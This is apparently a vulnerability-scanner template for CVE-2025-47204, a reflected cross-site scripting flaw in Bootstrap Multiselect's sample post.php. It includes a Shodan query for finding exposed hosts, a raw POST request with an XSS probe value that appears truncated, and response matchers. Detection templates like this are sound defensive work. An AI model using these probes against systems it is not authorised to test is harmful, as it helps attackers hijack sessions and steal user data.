id: CVE-2025-47204
info:
name: Bootstrap Multiselect <= 1.1.2 - Cross-Site Scripting
author: r3naissance
severity: medium
description: |
A PHP script in the source code release echoes arbitrary POST data. If a developer adopts this structure wholesale in a live application, it could create a Reflective Cross-Site Scripting (XSS) vulnerability exploitable through Cross-Site Request Forgery (CSRF).
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
remediation: |
Only use the necessary components (css/js) in production applications
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-47204
metadata:
verified: true
max-request: 1
shodan-query: html:"bootstrap-multiselect"
tags: cve,cve2025,xss,bootstrap-multiselect
http:
- raw:
- |
POST /bootstrap-multiselect/post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
canary=">
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'contains_all(body, "", "bootstrap-multiselect-master")'
condition: and
# digest: 4a0a0047304502206f11f91aabab074e45b181b94383dce9e5261fd85dc1d7f2850b90723818897e022100c671a89477c49418c49c0af6be1a341ad1158f6ff9c1a4f5303feb2e1a06c968:922c64590222798bb761d5b6d8e72950